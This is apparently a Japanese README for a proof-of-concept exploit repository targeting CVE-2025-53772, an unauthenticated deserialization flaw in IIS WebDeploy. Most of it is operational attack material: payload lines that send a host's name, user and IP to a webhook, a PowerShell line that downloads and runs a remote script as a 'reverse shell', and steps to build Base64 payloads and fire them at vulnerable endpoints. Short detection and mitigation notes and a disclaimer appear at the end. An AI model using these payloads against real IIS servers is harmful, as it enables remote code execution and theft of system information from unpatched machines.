
CVE-2025-53772 の概念実証 (PoC) エクスプロイト。IIS WebDeploy の安全でないデシリアライゼーションを介したリモートコード実行 (RCE) の脆弱性です。情報収集、コマンド実行、リバースシェル向けのカスタマイズ可能なペイロード生成を含みます。
このリポジトリには、安全でない逆シリアル化による IIS WebDeploy のリモート コード実行 (RCE) 脆弱性 (CVE-2025-53772) の概念実証 (PoC) エクスプロイトが含まれています。
このツールは、教育および許可されたセキュリティテストのみを目的としています。作者は、このソフトウェアの誤用または損害について一切責任を負いません。所有しているシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。
poc.cs の 18〜19 行目のペイロードを編集して、対象となるアクションを指定します: csharp// Replace with your webhook URL and desired payload set.Add("cmd.exe"); set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H "Content-Type: application/json" -d "{\"hostname\":\"%COMPUTERNAME%\",\"user\":\"%USERNAME%\",\"ip\":\"$(curl -s ifconfig.me)\",\"exploit\":\"CVE-2025-53772\",\"timestamp\":\"%DATE% %TIME%\"}"");
情報収集 (推奨): csharpset.Add("powershell.exe"); set.Add("-Command "$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'"");
簡単なコマンド実行: csharpset.Add("cmd.exe"); set.Add("/c calc.exe"); // Opens calculator リバースシェル (上級者向け): csharpset.Add("powershell.exe"); set.Add("-Command "IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");
GitHub Action が PoC を自動的にコンパイルし、Base64 エンコードされたペイロードを生成します:
変更をプッシュして GitHub Action をトリガーします リポジトリの Actions タブに移動します 最新のワークフロー実行をクリックします コンソール出力で生成されたペイロードを見つけます:
3. エクスプロイトを展開する
生成された Base64 ペイロードを、脆弱な IIS WebDeploy エンドポイントに対して使用します:
🎯 脆弱性の詳細
対象ソフトウェア: IIS WebDeploy (複数のバージョン) 脆弱性の種類: RCE につながる安全でない逆シリアル化 攻撃ベクトル: リモート、認証不要 深刻度: Critical
GitHub Actions ではなくローカルでコンパイルしたい場合: bash# Windows with .NET Framework C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt
csc poc.cs poc.exe 📡 Webhook の設定
webhook.site にアクセスして、無料の Webhook URL を取得します ペイロード内の YOUR-WEBHOOK-ID を自分の一意の ID に置き換えます 着信リクエストを監視して、エクスプロイトの実行結果を確認します
検出:
BinaryFormatter の逆シリアル化における異常なアクティビティを監視する IIS ワーカープロセスからの不審なプロセス生成を探す 予期しない外部接続のネットワーク監視
緩和策:
IIS WebDeploy を最新のパッチ適用済みバージョンに更新する 入力検証とサニタイズを実装する 逆シリアル化タイプに許可リストを使用する ネットワークのセグメンテーションと監視を展開する
CVE-2025-53772 の詳細 Microsoft セキュリティ アドバイザリ NIST 脆弱性データベース